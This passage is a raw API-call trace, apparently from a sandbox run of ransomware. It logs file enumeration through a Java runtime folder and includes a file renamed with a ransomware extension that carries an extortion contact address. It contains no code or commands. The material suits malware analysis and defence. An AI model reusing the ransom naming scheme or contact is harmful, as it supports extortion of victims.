dwReserved1=0x0, cFileName="prism_sw.dll", cAlternateFileName="")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.dll", cAlternateFileName="")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmid.exe", cAlternateFileName="")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8af971e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmiregistry.exe", cAlternateFileName="RMIREG~1.EXE")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="server", cAlternateFileName="")) returned 1 [0179.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4380050 [0179.328] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2d58 [0179.329] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.329] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0xab35b530, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xab35b530, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xabaa88bc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11d0000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="classes.jsa", cAlternateFileName="")) returned 1 [0179.329] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x866c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jvm.dll", cAlternateFileName="")) returned 1 [0179.330] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x33d2eca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x678, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="XUSAGE~1.BAT")) returned 1 [0179.330] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x33d2eca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x678, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="XUSAGE~1.BAT")) returned 0 [0179.330] FindClose (in: hFindFile=0x43a2d58 | out: hFindFile=0x43a2d58) returned 1 [0179.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0179.330] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0179.331] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="splashscreen.dll", cAlternateFileName="SPLASH~1.DLL")) returned 1 [0179.331] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8ba40, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssv.dll", cAlternateFileName="")) returned 1 [0179.331] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssvagent.exe", cAlternateFileName="")) returned 1 [0179.331] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x3cf0998, Size=0x10000) returned 0x4380050 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21240, dwReserved0=0x0, dwReserved1=0x0, cFileName="sunec.dll", cAlternateFileName="")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sunmscapi.dll", cAlternateFileName="SUNMSC~1.DLL")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e440, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2k.dll", cAlternateFileName="")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="tnameserv.exe", cAlternateFileName="TNAMES~1.EXE")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13840, dwReserved0=0x0, dwReserved1=0x0, cFileName="unpack.dll", cAlternateFileName="")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x30240, dwReserved0=0x0, dwReserved1=0x0, cFileName="unpack200.exe", cAlternateFileName="UNPACK~1.EXE")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x0, dwReserved1=0x0, cFileName="verify.dll", cAlternateFileName="")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="w2k_lsa_auth.dll", cAlternateFileName="W2K_LS~1.DLL")) returned 1 [0179.332] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1ae40, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAccessBridge-64.dll", cAlternateFileName="WINDOW~1.DLL")) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="wsdetect.dll", cAlternateFileName="")) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x0, dwReserved1=0x0, cFileName="zip.dll", cAlternateFileName="")) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x0, dwReserved1=0x0, cFileName="zip.dll", cAlternateFileName="")) returned 0 [0179.333] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0179.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lib", cAlternateFileName="")) returned 1 [0179.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43c3080 [0179.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\*", lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a2a98 [0179.333] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.333] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x95, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.properties", cAlternateFileName="ACCESS~1.PRO")) returned 1 [0179.334] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="amd64", cAlternateFileName="")) returned 1 [0179.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4390058 [0179.334] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2fd8 [0179.334] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.334] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jvm.cfg", cAlternateFileName="")) returned 1 [0179.334] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jvm.cfg", cAlternateFileName="")) returned 0 [0179.334] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0179.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.334] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0179.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4390058 [0179.334] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2ad8 [0179.335] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.335] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0179.335] FindClose (in: hFindFile=0x43a2ad8 | out: hFindFile=0x43a2ad8) returned 1 [0179.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.335] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0179.335] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa7bbd53, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa7bbd53, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="charsets.jar", cAlternateFileName="")) returned 1 [0179.335] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x14983, dwReserved0=0x0, dwReserved1=0x0, cFileName="classlist", cAlternateFileName="CLASSL~1")) returned 1 [0179.335] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, 